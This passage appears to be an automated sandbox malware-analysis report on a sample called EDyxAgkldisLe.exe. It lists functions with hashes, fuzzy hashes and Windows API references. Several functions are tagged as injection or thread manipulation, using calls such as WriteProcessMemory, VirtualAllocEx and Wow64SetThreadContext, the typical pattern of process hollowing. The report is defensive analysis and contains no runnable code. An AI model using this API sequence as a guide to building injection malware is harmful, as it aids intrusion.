Instruction ID: c36d6754c7770fd9e0e9aa9b138f12d2241b6e172a78c7ffd58e14a1c2b4ccdb
Opcode Fuzzy Hash: 18a0694d3caac70cd89483561f63cf7a682fb95f20dc20185159e0b7dae22f8a
Instruction Fuzzy Hash: 55915971D00369CFEB24DF68C841BEDBBF2BB48305F0481A9E808A7244DB749985CFA5

Function 00D4ADA8 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D4AFFE

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1aa1dc9cf88be52ab730820f5e6cfae1fdd068d4d6846cad30d9929d46c68e5b
Instruction ID: 34433b3408dbd0fe6cd8bbb00f8a029f8e9a547137670e095cac7a4812a50116
Opcode Fuzzy Hash: 1aa1dc9cf88be52ab730820f5e6cfae1fdd068d4d6846cad30d9929d46c68e5b
Instruction Fuzzy Hash: A8815970A00B458FDB24DF29D44579AB7F1FF88304F04492EE496DBA50D775E84ACBA1

Function 04F818E4 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81A02

Memory Dump Source

Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b2fd02bf1d5911434140357ab16c86a098ef9bb4e8f8e255f77bd0cc59e737f7
Instruction ID: c7f45d60d834aaec4101d958b6d3158b96eee5013c1678dda6876a6ac53116c4
Opcode Fuzzy Hash: b2fd02bf1d5911434140357ab16c86a098ef9bb4e8f8e255f77bd0cc59e737f7
Instruction Fuzzy Hash: 2551C2B1D00309DFDB14DF99C984ADEBBB5FF48300F24822AE419AB210D775A986CF91

Function 04F818F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81A02

Memory Dump Source

Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fa58c864f94940c93fb055c345718ccf5070017d368bd17934e165b57a823a01
Instruction ID: 8c4dd1e747a8843a97c32d2e79addd705ebf957c9fff33532e6e50447006a706
Opcode Fuzzy Hash: fa58c864f94940c93fb055c345718ccf5070017d368bd17934e165b57a823a01
Instruction Fuzzy Hash: F341C2B1D10309DFDB14CF99C984ADEBBB5BF48310F24822EE419AB210D775A946CF91

Function 00D444C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D459C9

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 73b4f23d2471914ab76a36e5254edeb74fbe9c1a094a8c3c4122e949cf401d01
Instruction ID: ea1b8e611992af95ac93be3fe0e914b3b5a502081026f73b3b92dbb716099481
Opcode Fuzzy Hash: 73b4f23d2471914ab76a36e5254edeb74fbe9c1a094a8c3c4122e949cf401d01
Instruction Fuzzy Hash: 3141C170C00718CBEB24CFA9D88578DBBF5BF48304F24816AD408AB255DB756945CFA0

Function 00D4590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D459C9

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a77a08fe376d5b1500488c01467600190bb8810e371d72a1f969faf2977cb984
Instruction ID: 6efab34a7166ffc5820b3b78691a91f006ad0069545e6bd6035ce3da0514f538
Opcode Fuzzy Hash: a77a08fe376d5b1500488c01467600190bb8810e371d72a1f969faf2977cb984
Instruction Fuzzy Hash: 2E41C1B0C00719CFEB25CFA9D885B8DBBF5BF49304F24816AD408AB255DB756946CFA0

Function 04F84040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04F84101

Memory Dump Source

Source File: 0000000B.00000002.1307793012.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4f80000_EDyxAgkldisLe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6e2daf9a3b3ed853ee0497f15e153f42d40aa10e63239b7dda9947eeeb27f25c
Instruction ID: 50654599ccd23b3dac4a8c6cc3b3572baca412169303a61e70b6f556c56c8d8b
Opcode Fuzzy Hash: 6e2daf9a3b3ed853ee0497f15e153f42d40aa10e63239b7dda9947eeeb27f25c
Instruction Fuzzy Hash: 884115B9A00319CFDB15DF99C848AAAFBF5FB88314F248459D519AB321D375A841CFA0

Function 08724898 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08724930

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8cde77a4d48f1e6ccbdd4f91d780b314342b3dc1cc289196667bcdde9159f4ca
Instruction ID: 6c27d930ca6ebecd44189fe03f1fca78c50d4aa0ccdd8fe3239f2fcd6d0ea3c5
Opcode Fuzzy Hash: 8cde77a4d48f1e6ccbdd4f91d780b314342b3dc1cc289196667bcdde9159f4ca
Instruction Fuzzy Hash: 172113B2D00359DFDB10CFA9C880BEEBBF1FB48310F14842AE958A7650C7799940CB69

Function 087248A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08724930

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d53e56ae467188c51a72e700f42222f84e1506675e18010eacf58591dbcd97f9
Instruction ID: af19a7659d7670137716fe7fc0af0a9929aa036292c09cd95a7a5dabeb249623
Opcode Fuzzy Hash: d53e56ae467188c51a72e700f42222f84e1506675e18010eacf58591dbcd97f9
Instruction Fuzzy Hash: 162115B2D003599FDB10CFAAC881BDEBBF5FB48310F10842AE958A7240C7799940CBA4

Function 08724700 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08724786

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 85f56653e45ecb2c66dbcf23725c61168e2fcd40692095eac0db875fdbfb4274
Instruction ID: e1883d25d096425a91cbe75505fc5e150efed24065129b50b1941830c8cfa591
Opcode Fuzzy Hash: 85f56653e45ecb2c66dbcf23725c61168e2fcd40692095eac0db875fdbfb4274
Instruction Fuzzy Hash: CE2137B5D00308CFDB14DFAAC5857AEBBF4EB88214F14842ED469A7740DB789945CFA8

Function 00D4D689 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D717

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2ec5a3d645d10299e0ca183604e25d2bc9b5430a1d75d83ea93dad755c292bb9
Instruction ID: d801cac08204dbd6de7465e3499a9afc41e2a87ee6b58956636e2285fef299a6
Opcode Fuzzy Hash: 2ec5a3d645d10299e0ca183604e25d2bc9b5430a1d75d83ea93dad755c292bb9
Instruction Fuzzy Hash: 0221E2B5D01248DFDB10CFAAD984ADEBBF5FB48314F14801AE918A7350D379A941CFA5

Function 08724990 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08724A10

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eec5588500ef4931110f7775797f87f3d86add053b1d357ed91aa8271da071bd
Instruction ID: 8ca82813cc41103c8f4170353b55bd2958a1779d0f5afc39adad3383196d9512
Opcode Fuzzy Hash: eec5588500ef4931110f7775797f87f3d86add053b1d357ed91aa8271da071bd
Instruction Fuzzy Hash: 8E2116B1C003599FDB10CFAAC840BDEBBF5FF48310F10842AE558A7640C7799940DBA9

Function 08724989 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08724A10

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f2dc2b9a981a160d6803fcd4c8bfab40c2b273b9c58848ab26325f06569e659c
Instruction ID: caac335aed74e0606a98287f712d0d35ea2ce920b1dafd7db18d7ac8ef75b019
Opcode Fuzzy Hash: f2dc2b9a981a160d6803fcd4c8bfab40c2b273b9c58848ab26325f06569e659c
Instruction Fuzzy Hash: 4B2105B2C01259DFDB10CFAAC941BEEBBF5FF48310F54842AE558A7640C7799940DB68

Function 08724708 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08724786

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f90be6e6ecbe78f4c8e89e13aa871f82bb99f29a0a698ab163ddf9d67e8e96a4
Instruction ID: 804c1d3d3771550ed0c1cd6734ac0b46920add0883e8869fc484a2c025000fa9
Opcode Fuzzy Hash: f90be6e6ecbe78f4c8e89e13aa871f82bb99f29a0a698ab163ddf9d67e8e96a4
Instruction Fuzzy Hash: B0213471D003088FDB14DFAAC485BAEBBF4AB48214F14842ED469A7640CB78A945CFA9

Function 00D4D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D4D717

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa17f21f88160e8168c91774100fa39da20f9256dc6dcebc9832a794cb031a70
Instruction ID: 09618c2daf412e9744875504f8eee4d91fd8e0c16e5bac123f11c2f557e99328
Opcode Fuzzy Hash: fa17f21f88160e8168c91774100fa39da20f9256dc6dcebc9832a794cb031a70
Instruction Fuzzy Hash: D021E2B5D002489FDB10CFAAD984ADEBBF9FB48310F14801AE918A3350C379A940CFA5

Function 087247D8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0872484E

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c3174222e92d371f8ff029b7cb1024c635269d5e2041d641a14b877ba0447d6
Instruction ID: 0a4c208a475499ddca36bac35798f03887f083c5da93d18e69b26602f3104d4c
Opcode Fuzzy Hash: 9c3174222e92d371f8ff029b7cb1024c635269d5e2041d641a14b877ba0447d6
Instruction Fuzzy Hash: 7F115672C002489FDF20CFAAD844BDEBBF5EB48324F14841AE929A7650C7759541CFA4

Function 00D4A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4B079,00000800,00000000,00000000), ref: 00D4B28A

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5f84b8e08c6fbdb3b4e0aae00fd9aa25b2d42b5eb48ddd0daaa24ac79ff2698f
Instruction ID: e3dd553a0289338faae94f9985bfcee9fa3465ec22c998cf0514052bef76af73
Opcode Fuzzy Hash: 5f84b8e08c6fbdb3b4e0aae00fd9aa25b2d42b5eb48ddd0daaa24ac79ff2698f
Instruction Fuzzy Hash: 3E1117B6C003089FDB10CF9AD444BDEFBF4EB48320F14842AD455A7200C3B5A545CFA9

Function 00D4B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4B079,00000800,00000000,00000000), ref: 00D4B28A

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 23cc068b465ad966a829520bac833f64fb41e5bcd7ca5a140e8b237dd04f32eb
Instruction ID: ded87e51d14f24686686ffcb8b14c1fe91365e43e4a7967e3c8cbdde98b9427e
Opcode Fuzzy Hash: 23cc068b465ad966a829520bac833f64fb41e5bcd7ca5a140e8b237dd04f32eb
Instruction Fuzzy Hash: E31114B6C002498FDB10CFAAD444BDEFBF4EB48320F14842AD459A7300C3B5A545CFA9

Function 087247E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0872484E

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7e296312f4fff9659b94edb3e99fb6b507193eda6cf3a5c6d07cac31a8cdcd20
Instruction ID: 4f6c8ad4d27c751461932fe70dde32002c2a11f344b9ebe906dd53da1c4caef4
Opcode Fuzzy Hash: 7e296312f4fff9659b94edb3e99fb6b507193eda6cf3a5c6d07cac31a8cdcd20
Instruction Fuzzy Hash: 1F112672C003489FDB24DFAAC844BDEBBF5EB48314F14841AE529A7650C7759540CFA9

Function 08724218 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08724282

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6b6644c467835a46c94491fd06599a75f514b32f991fc19a8ab5a402e2fdff01
Instruction ID: 68c3e282741ee86cdf304eeb01e8b17c5fb9a5b77a1da00ec78e8962a11af5bf
Opcode Fuzzy Hash: 6b6644c467835a46c94491fd06599a75f514b32f991fc19a8ab5a402e2fdff01
Instruction Fuzzy Hash: 0D1146B2D00258CFDB24DFAAC4857DEBBF4EB48314F24841AD419A7640C7796545CBA9

Function 08724220 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08724282

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6a8a075254db9c893af59108c01c11aad99e1bdffb9dd1eb812ce3c0f64e3033
Instruction ID: 886ca3d8a5680bbe72210e4be759ad11415dd575629fb722c7af2e79bf03cd35
Opcode Fuzzy Hash: 6a8a075254db9c893af59108c01c11aad99e1bdffb9dd1eb812ce3c0f64e3033
Instruction Fuzzy Hash: 7E1128B1D003488FDB24DFAAC44579EFBF4AB48314F24841AD419A7640C7796540CBA9

Function 00D4AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D4AFFE

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1f42b4a31ad695286db173ea0d0c6a785ba6c21620366faaffba332861200ec1
Instruction ID: 29998395bbb56570dd879e0ddbf721b0afdbbdccc12947d5e08964209a5527c7
Opcode Fuzzy Hash: 1f42b4a31ad695286db173ea0d0c6a785ba6c21620366faaffba332861200ec1
Instruction Fuzzy Hash: AF11E0B6C002498FDB24CF9AD444BDEFBF4EF88324F14842AD869A7610D379A545CFA5

Function 087258E4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0872960D

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b5c6a975a5907c19b00daa781bf61a74ae0b02a063a7404dff6d8ea3259b98e4
Instruction ID: 5b78e265b19f97629aea9e022e65869e9000be194350dd80e476456aa973cbf0
Opcode Fuzzy Hash: b5c6a975a5907c19b00daa781bf61a74ae0b02a063a7404dff6d8ea3259b98e4
Instruction Fuzzy Hash: 0511F2B5800358DFDB20DF9AD885BDEBBF8FB48310F14841AE958A7240C375A944CFA5

Function 087295A8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0872960D

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 36d8b9fb696ffd0a9658846968a8ac48be4e509f72eddcae0e62ecc7095ec272
Instruction ID: e73d9470f070f156a270d337346dd1d8c59105cf997b7c5ded311064e6d41bf8
Opcode Fuzzy Hash: 36d8b9fb696ffd0a9658846968a8ac48be4e509f72eddcae0e62ecc7095ec272
Instruction Fuzzy Hash: C311F2B6800259CFDB20CF9AD989BDEBBF4EB48310F14845AE958A7600C375A544CFA5

Function 00CED1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9ae442fbf1c0ef02ab72205e0d78e977a34b2b8218c9bf41a266eea0e3f5e8
Instruction ID: 1d99e2db005f6bc550caf97fc1745b66e2215b97b2bafe67f825c8f472393688
Opcode Fuzzy Hash: cd9ae442fbf1c0ef02ab72205e0d78e977a34b2b8218c9bf41a266eea0e3f5e8
Instruction Fuzzy Hash: 0621F172504380EFDF15DF51D9C0B26BBA5FB88310F2085A9EA0A0B246C336DC56DBA2

Function 00CFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d286e58716cd901d05ca66c398f0dc30409e6c1228a0c51211a939dbb4365e7f
Instruction ID: 3aa576488f1bb89e938dbcf3b355be7cd3c355d187b57bb9bdc4be1b2ac837c9
Opcode Fuzzy Hash: d286e58716cd901d05ca66c398f0dc30409e6c1228a0c51211a939dbb4365e7f
Instruction Fuzzy Hash: F821F571504308EFDB54DF20D5C4B26BBA6FB84314F20C56DEA0A4B296CB36D847CA63

Function 00CFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15599acd94fc20a3e3fd38721783bbf8595530bd9bb150826a353575da2b202
Instruction ID: 758879ed4f9ed1cca4b8c2d92df687a520d281035c0301ecc1ea099f976205fc
Opcode Fuzzy Hash: a15599acd94fc20a3e3fd38721783bbf8595530bd9bb150826a353575da2b202
Instruction Fuzzy Hash: BB210771904308EFDB55DF10D5C0B26BBA6FB84314F20C5ADEA0A4B292C336DC46CAA2

Function 00CFD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb8d91221640ba896609ef930aa856f639427e3c5953cbadec0f5fc285c5e72
Instruction ID: cb153eed29fdda88a5bddd55e677030714f9a853b8af0208f6612af91d40edc6
Opcode Fuzzy Hash: bcb8d91221640ba896609ef930aa856f639427e3c5953cbadec0f5fc285c5e72
Instruction Fuzzy Hash: 9B219F755093C48FCB12CF20D994715BF72EB46314F28C5EAD9498F6A7C33A980ACB62

Function 00CED1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
Instruction ID: 34df0bd82f5c5e5712ee290b3bf29eadef9b7a7e91941de81e6d8bb37a4b4407
Opcode Fuzzy Hash: 171fa7ccdf6541722990f4edf01c7d65a556f79bcbf286ad7868c20aa591fdff
Instruction Fuzzy Hash: AC21AF76504280DFCB16CF50D9C4B16BF72FB84314F24C5A9DD090B656C33AD926CBA1

Function 00CFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304633475.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_cfd000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
Instruction ID: f4a94f3d2fb31f95a5a1e6023fa72f26888a7e24e80eea53e943a60fd2a5fbcc
Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
Instruction Fuzzy Hash: E311DD75504284DFCB16CF10D5C4B25FBB2FB84314F24C6AED94A4B696C33AD84ACBA2

Function 00CED759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45e7eba27e5b6bc3b767a8cf65f9b5f2ae2ee89435a613debac529864b44380
Instruction ID: d00fb4f8112b895fda72adb6e225470bfefe6349b00798b73cf61a69c872bac0
Opcode Fuzzy Hash: e45e7eba27e5b6bc3b767a8cf65f9b5f2ae2ee89435a613debac529864b44380
Instruction Fuzzy Hash: F601DB714043809FE7204B27DD84766FBD8EF51764F18855AED1A4F28AC3799C40CAB1

Function 00CED758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1304577228.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ced000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da590d9279ae04330a4de551066a5c3dbaceae49f3fc968f7553ce5840303751
Instruction ID: 4635655a5af4408c850270fb057519c9a659d603ad1400758cdd02ea12c76c54
Opcode Fuzzy Hash: da590d9279ae04330a4de551066a5c3dbaceae49f3fc968f7553ce5840303751
Instruction Fuzzy Hash: AFF0CD71004380AEEB208B06DD84B62FBA8EF50724F18C45AED190B28AC379AC40CAB1

Analysis Process: EDyxAgkldisLe.exePID: 8004, Parent PID: 7276COMMON

Executed Functions

Function 00E4C470 Relevance: 9.0, Strings: 7, Instructions: 245COMMON

Download Yara Rule

Strings

0oEp, xrefs: 00E4C4E2
LjEp, xrefs: 00E4C64F
PHq, xrefs: 00E4C6D8
LjEp, xrefs: 00E4C665
PHq, xrefs: 00E4C3E7
PHq, xrefs: 00E4C3F8
PHq, xrefs: 00E4C6C7

Memory Dump Source

Source File: 00000017.00000002.3692676756.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_e40000_EDyxAgkldisLe.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq$PHq$PHq
API String ID: 0-2403998005
Opcode ID: f96eac92aa48b2888048dc5ed0000813cc8c3170546a67016817736797bc657b
Instruction ID: 8ecf988e39808e883f885510fd28b35f91c0eda1a4a950077bdd44a8746a0e57
Opcode Fuzzy Hash: f96eac92aa48b2888048dc5ed0000813cc8c3170546a67016817736797bc657b
